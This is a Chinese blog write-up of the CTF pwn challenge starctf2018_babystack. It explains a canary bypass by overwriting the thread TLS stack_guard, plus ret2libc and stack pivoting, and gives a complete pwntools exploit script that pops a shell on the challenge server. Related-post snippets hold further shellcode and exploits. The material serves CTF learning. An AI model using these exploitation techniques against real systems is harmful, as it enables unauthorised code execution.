(BUUCTF)starctf2018_babystack

最新推荐文章于 2024-07-12 15:53:09 发布
最新推荐文章于 2024-07-12 15:53:09 发布
阅读量149 收藏
点赞数
分类专栏: pwn_writeup 文章标签: 网络安全 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xy1458214551/article/details/134693395
版权

文章目录

前置知识

  • canary防御措施与其绕过
  • ret2libc
  • 栈迁移(可用)

整体思路

题目非常简单粗暴,主要逻辑是在一个子线程中实现的。首先输入要输入的长度,然后再输入payload,且长度可以非常大。因此,要进行栈溢出的唯一难点就在canary,而canary是位于fs寄存器中的,也就是TLS结构体的一个偏移。在子线程中,tls结构体在栈中的偏移是固定的,可以在gdb中通过p/x *(tcbhead_t*)(pthread_self())方式来查看tls结构体的值。其中stack_guard就是canary的值,校验canary时会取出这个值和栈中的canary进行校验,因此覆盖这个值为想要的值即可。可以在gdb通过p/x &(*(tcbhead_t*)(pthread_self())).stack_guard来查看其地址。
此外,在ret2libc过程中我没有回到函数起始位置,而是布置了一个read函数来读取数据到可读写段再栈迁移,这是由于回到函数起始位置的方式难以调试。

exp

from pwn import *
from LibcSearcher import *

filename = './bs'
context(log_level='debug')
local = 0
elf = ELF(filename)
libc = ELF('/glibc/2.27-3ubuntu1_amd64/libc.so.6')

if local:
    sh = process(filename)
else:
    sh = remote('node4.buuoj.cn', 28009)

def debug():
    pid = util.proc.pidof(sh)[0]
    gdb.attach(pid)
    pause()


def leak_info(name, addr):
    success('{} => {}'.format(name, hex(addr)))


pop_rdi = 0x400c03 
pop_rsi_r15 = 0x400c01
leave_ret = 0x400955

sh.recv()
sh.sendline(str(0x1848 + 0x8))
fake_rbp = 0x602100
payload = b'a'*0x1010 + p64(fake_rbp) + p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(fake_rbp) + p64(0xdeadbeaf) + p64(elf.plt['read']) + p64(leave_ret)
payload = payload.ljust(0x1848+8, b'a')
sh.send(payload)
sh.recvuntil('It\'s time to say goodbye.\n', drop=False)
puts_leak = u64(sh.recv(6).ljust(8, b'\x00'))
leak_info('puts_leak', puts_leak)
libc.address = puts_leak - 0x809c0
leak_info('libc.address', libc.address)

system_addr = libc.sym['system']
str_bin_sh = next(libc.search(b'/bin/sh\x00'))
one_gadget = [0x4f2c5, 0x4f322, 0x10a38c]
payload = p64(0xdeadbeaf)  + p64(one_gadget[1] + libc.address) +p64(0xdeadbeaf)
# payload = p64(0xdeadbeaf) + p64(pop_rdi) + p64(str_bin_sh) + p64(system_addr) +p64(0xdeadbeaf)
leak_info('system', system_addr)
leak_info('str_bin_sh', str_bin_sh)
# debug()
sh.send(payload)
sh.interactive()
# debug()

参考链接

starctf2018_babystack | ZIKH26’s Blog

LtfallQwQ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
0ctf2018-babystack_writeup
CabbageWind的博客
08-17 865
题目:0ctf2018-babystack 检查保护机制: 可以看到程序只提供了NX保护。 在IDA中进行反编译,发现一个可读的位置,存在栈溢出漏洞,可能可以利用: 使用peda计算read位置的偏移: 得到read位置距离返回地址的偏移为44,比read的长度0x40小,说明栈溢出漏洞可直接被利用。 查看文件ELF表 通过elf表中查看得知程序中不存在system函数,无法直接跳转;也不存在输出函数,无法打印got表地址。 查看vmmap 通过vmmap可以看到bss段可
buuoj Pwn writeup 221-225
yongbaoii的博客
08-31 874
221 starctf2018_babystack 222 xm_2019_awd_pwn2 223 jarvisoj_level6 224 hctf2018_the_end 225 inndy_onepunch
Ubuntu18学习记录(持续更新中~~~)
Probeginner的博客
10-27 543
避免虚拟机崩溃
CTF】XCTF攻防世界web新手区
qq_45461251的博客
12-19 707
1、view source F12查看源代码即可。 2、get_post 第一步题目提示: 请用GET方式提交一个名为a,值为1的变量 于是更改URL为: 111.198.29.45:43088/?a=1 又根据提示有: 请再以POST方式随便提交一个名为b,值为2的变量 所以用火狐浏览器的插件hackbar: 3、robots 根据提示考察robots协议,于是更改URL为: 1...
starctf_2019_babyshell
m0_57754423的博客
04-06 313
绕过检查,即可写入shellcode 。 我们只需要,输入一个以\x00开头的汇编指令,随后写入shellcode即可执行。 from pwn import * context.arch="amd64" p=remote('node4.buuoj.cn',29743) shellcode='\x00J'+'\x00'+asm(shellcraft.sh()) p.sendline(shellcode) p.interactive() ...
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
CTF WriteUp】2021 starCTF部分Crypto题解
cccchhhh6819的博客
01-18 4324
(打比赛感想:大佬真TM多。。。) Crypto Crypto-GuessKey 题目 from random import randint import os from flag import flag N=64 key=randint(0,2**N) print key key=bin(key)[2:].rjust(N,'0') count=0 while True: p=0 q=0 new_key='' zeros=[0] for j in range(len(key)): if key
StarCTF2021-MISC-Writeup
末初的CSDN博客
01-20 1183
文章目录signinMineGamelittle trickspuzzleFeedback signin Welcome to *CTF 2021, join telegram to get flag: https://t.me/starCTF *CTF{we1c0me_to_the_starCTF2021~} MineGame If you love reverse, you can try it, otherwise, you must finish it as quickly as pos
从0ctf2018 babystack学习return to dl-resolve
极目楚天舒的博客
05-06 1815
0x01程序分析首先查看main函数,比较简单,调用了alarm和sub_80483B,进入sub_80483B看看。sub_80483B的作用是读取0x40个字节到ebp-40处,这里显然存在栈溢出漏洞。发现只开了一个栈不可执行,于是想构造rop链。但是整个文件搜索下来也没有发现什么有价值的gadget。0x02  return to dl-resolve知识学习玩过pwn的赛棍都知道,pwn题...
starctf2018_note(栈上的null off by one)
seaaseesa的博客
07-25 557
starctf2018_note(栈上的null off by one) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,在add函数里的scanf(“%256s”,&s)存在null off by one,其结果是将在栈里的rbp值低1字节覆盖为0。 将栈里rbp的值低1字节覆盖为0后,其结果导致main函数的rbp上移,这样,我们就可以在add里的可控缓冲区里控制main函数里scanf的格式化字符串指针,我们将其修改为%236s的地址,这样就能在main函数里进行栈溢出
bjdctf_2020_babystack
、moddemod
06-13 782
exp from pwn import * context(log_level = 'debug') proc_name = './bjdctf_2020_babystack' elf = ELF(proc_name) # p = process(proc_name) p = remote('node3.buuoj.cn', 29943) pop_ret = 0x400833 system_addr = elf.sym['system'] bin_sh_str = 0x400858 payload =..
BUUCTF:bjdctf_2020_babystack2(write up)
qq_44768749的博客
08-24 1477
BUUCTF:bjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 先输入name的长度,再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路 比较nbytes和10的大小,可以利用符号溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数ge
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8332
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1102
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
最新发布
TSINGSEE青犀视频官方技术博客
07-12 641
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
buuctf re luky_guy
09-27
buuctf re是一个缩写,表示buuctf关于luky_guy的回答。根据提供的引用内容,Luky库是一组抽象复杂操作的Java类,包括用于网络、事件处理、加密、数据库处理、snmp监视、队列、信号量、解析器、XML处理程序等的类。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值